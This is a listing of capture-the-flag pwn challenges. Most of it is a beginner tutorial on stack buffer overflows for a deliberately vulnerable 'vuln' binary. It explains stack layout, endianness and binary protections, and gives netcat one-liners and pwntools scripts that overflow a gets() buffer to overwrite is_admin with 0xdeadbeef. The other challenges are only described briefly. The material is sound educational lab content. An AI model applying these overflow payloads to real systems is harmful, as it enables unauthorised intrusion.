Pwn:
buffer-overflow-intro:
Difficulty
baby
Categories
pwn,shc2026-qualifier
Description
Buffer Overflow Introduction
This program asks for a password. There's a variable called is_admin that needs to equal 0xdeadbeef to get the flag.
The program uses gets(), which is vulnerable to buffer overflow.
Access: Connect to the binary with ncat --ssl [host] [port] or use pwntools.
The web interface provides educational content and downloadable source code.
Author
xnull
Buffer Overflow Introduction
Challenge
Make the is_admin variable equal to 0xdeadbeef to get the flag.
Downloads:
[Download binary (vuln)](<https://00a4caf8-4939-43c3-8ed3-9af2bbffeb75.challs.qualifier.swiss-hacking-challenge.ch:1337/vuln>)
[Download source code (vuln.c)](<https://00a4caf8-4939-43c3-8ed3-9af2bbffeb75.challs.qualifier.swiss-hacking-challenge.ch:1337/vuln.c>)
Understanding Memory Basics
What is a Buffer?
A buffer is simply a contiguous block of memory used to store data. Think of it as an array:
char buffer[64]; // A buffer that can hold 64 bytes
Buffers are used everywhere: reading user input, storing strings, network data, file contents, etc.
The Stack
The stack is a region of memory used for:
Local variables in functions
Function call information (return addresses)
Function parameters
The stack grows downward (from high addresses to low addresses) on most systems.
When you declare variables in a function, they're placed on the stack next to each other:
void function() {
char buffer[64]; // At lower address
int is_admin = 0; // At higher address (on the stack)
}
CPU Registers
Registers are small, fast storage locations in the CPU. Different architectures have different registers:
32-bit Architecture (x86)
eax, ebx, ecx, edx - General purpose registers (32 bits each)
esp - Stack pointer (points to top of stack)
ebp - Base pointer (points to base of current stack frame)
eip - Instruction pointer (points to next instruction)
64-bit Architecture (x86_64)
rax, rbx, rcx, rdx, rsi, rdi, r8-r15 - General purpose (64 bits each)
rsp - Stack pointer
rbp - Base pointer
rip - Instruction pointer
Note: 64-bit registers can access their lower 32 bits (e.g., eax is the lower 32 bits of rax)
Byte Order (Endianness)
Endianness refers to how multi-byte values are stored in memory:
Little Endian (x86/x86_64)
Least significant byte stored at the lowest address.
Value: 0xdeadbeef
Memory: [ef] [be] [ad] [de]
^ ^ ^ ^
Low address --> High address
This is what x86/x64 uses! When you write 0xdeadbeef, it's stored as \\xef\\xbe\\xad\\xde
Big Endian
Most significant byte stored at the lowest address (more intuitive for humans):
Value: 0xdeadbeef
Memory: [de] [ad] [be] [ef]
Used by some older systems and network protocols.
Understanding Buffer Overflows
A buffer overflow occurs when a program writes more data to a buffer than it can hold. The excess data overwrites adjacent memory.
In this challenge, the program has two variables on the stack:
A 64-byte buffer for user input
An is_admin variable stored right after the buffer
Stack layout (growing downward):
Higher addresses
+-----------------+
| is_admin | <-- We want to overwrite this!
+-----------------+
| buffer[63] |
| buffer[62] |
| ... |
| buffer[1] |
| buffer[0] | <-- Starts here
+-----------------+
Lower addresses
By sending more than 64 bytes, you overflow the buffer and overwrite is_admin with any value you want.
However you need to be extra careful with the payload size. The compiler might allocate extra space on the stack, so sometimes you need to find the right payload size by testing it.
Binary Security Features
Understanding checksec Output
The checksec tool shows what security features are enabled in a binary:
$ checksec vuln
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
Common Protections
Stack Canary: A random value placed before the return address. If it changes, the program detects tampering and crashes. When disabled, buffer overflows are easier.
NX (No eXecute): Marks the stack as non-executable. Prevents shellcode execution. When disabled, you can execute code on the stack.
PIE (Position Independent Executable): Randomizes where the program is loaded in memory. Makes exploitation harder. When disabled, addresses are predictable.
RELRO (Relocation Read-Only): Makes certain sections of memory read-only after loading. Prevents GOT (Global Offset Table) overwrite attacks.
When all protections are disabled, the binary is much easier to exploit (perfect for learning!).
Connecting to Remote Binaries
Using Netcat
Netcat (nc) is a simple tool for connecting to network services:
# Connect to the service
nc hostname 9999
# Send input interactively
# Type your payload and press enter
Sending Binary Data with Netcat
For binary payloads, pipe data into netcat:
# Using Python to generate payload
python3 -c "import sys; sys.stdout.buffer.write(b'A'*64 + b'\\\\xef\\\\xbe\\\\xad\\\\xde')" | nc hostname 9999
Note: 0xdeadbeef in little-endian is \\xef\\xbe\\xad\\xde
Using Echo with Netcat
echo -ne 'AAAA\\xef\\xbe\\xad\\xde' | nc hostname 9999
The Swiss Hacking Challenge way
Just open the challenge tile --> Click Copy --> Chose either Copy as ncat or Copy as pwntools
Writing Exploits with pwntools
What is pwntools?
Pwntools is a Python library designed for developing exploits. It handles network connections, payload crafting, and binary data manipulation.
Installing pwntools
pip install pwntools
Remote Exploit Example
Connect to the remote binary service:
from pwn import *
# Connect to the remote service
p = remote('hostname', 9999)
# Build the payload
payload = b'A' * 64 # Fill the buffer
payload += p32(0xdeadbeef) # Overwrite is_admin (little-endian)
# Send the payload
p.sendline(payload)
# Receive the flag
flag = p.recvall().decode()
print(flag)
Testing Locally First
Test your exploit on the downloaded binary before trying remote:
from pwn import *
# Test locally
p = process('./vuln')
# Same payload as above
payload = b'A' * 64 + p32(0xdeadbeef)
p.sendline(payload)
print(p.recvall().decode())
Key pwntools Functions
remote(host, port) - Connect to a remote service
process(binary) - Start a local process for testing
p32(value) - Pack a 32-bit integer in little-endian format
p64(value) - Pack a 64-bit integer in little-endian format
send(data) - Send raw data
sendline(data) - Send data followed by a newline
recv() - Receive data
recvline() - Receive a line of output
recvall() - Receive all output until EOF
interactive() - Drop into interactive shell
Tips
Run checksec vuln to see what protections are disabled
Use gdb or radare2 to analyze the binary and find buffer sizes
Remember that x86/x64 architectures use little-endian byte order
The gets() function is dangerous because it does not check buffer bounds
vuln.zip
canopysaurus:
Difficulty
medium
Categories
pwn,shc2026-qualifier
Description
Something's wrong with the brontosaurus powering Fred's car.
The Dino Control Unit (DCU) is acting up, and the mechanics at the Bedrock Motor Pool can't figure it out.
Can you find the reset code for the DCU and help Fred get back on the road?
Author
Kiwi
canopysaurus.tar.gz
stackosaurus:
Difficulty
easy
Categories
pwn,sourceless,shc2026-qualifier
Description
Jurassic Stack Park recently upgraded their containment management terminals. We managed to pull a copy of the binary off one of the kiosks near the T-Rex enclosure.
Author
0x90
stackosaurus.tar.gz
stacked-pwn:
Difficulty
hard
Categories
pwn,dach2026
Description
Turns out, the Jurassic Equipment Corporation computer that you were tasked to reverse-engineer is still in use at a large customer. Your task is to investigate if the computer's security is prehistoric itself.
Author
thebadgod
stacked-pwn.tar.gz
this-is-art:
Difficulty
hard
Categories
pwn,shc2026-qualifier
Description
I wrote this wonderful app to let you excavate the secrets buried at the bottom of an Android app :) (Note that it takes around two minutes for the challenge to start up)
Author
p.howe